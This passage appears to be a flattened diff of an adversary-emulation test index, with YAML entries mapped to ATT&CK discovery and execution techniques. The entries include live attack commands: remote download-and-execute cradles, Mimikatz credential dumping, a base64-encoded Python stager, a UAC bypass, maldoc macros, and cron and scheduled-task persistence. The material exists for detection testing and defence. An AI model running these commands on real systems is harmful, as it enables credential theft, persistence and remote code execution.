for a system. Upon execution, the machine GUID will be displayed from registry. -' + ' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid -' + ' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 @@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - windows executor: command: 'set -' + ' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - macos - linux executor: command: 'env -' + ' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all -' + ' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist -' + ' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" -' + ' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee @@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection -' + ' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; -' + ' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) -' + ' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. -' + ' supported_platforms: - windows executor: command: 'Get-Date -' + ' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date -' + ' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\" | python &\"" -' + ' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. -' + ' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} -' + ' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word -' + ' supported_platforms: - windows executor: @@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script -' + ' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx -' + ' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl -' + ' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} -' + ' cleanup_command: 'launchctl remove #{label_name} -' + ' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file -' + ' supported_platforms: - windows input_arguments: @@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed -' + ' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null @@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" -' + ' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' - description: 'Google Chrome must be installed -' + ' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta -' + ' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). -' + ' supported_platforms: - windows input_arguments: @@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro -' + ' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. -' + ' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel -' + ' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. -' + ' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) -' + ' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" -' + ' - description: 'Microsoftt #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore -' + ' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" -' + ' name: command_prompt elevation_required: true - name: Run BloodHound from local disk @@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" -' + ' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -' + ' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. -' + ' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" -' + ' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da @@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" -' + ' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" -' + ' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" -' + ' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed -' + ' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually -' + ' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion -' + ' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive -' + ' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically -' + ' executor: name: powershell command: | @@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore -' + ' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled -' + ' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting -' + ' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments @@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} -' + ' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" -' + ' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia -' + ' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests -' + ' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments -' + ' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" -' + ' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. -' + ' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} -' + ' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt -' + ' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null -' + ' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX 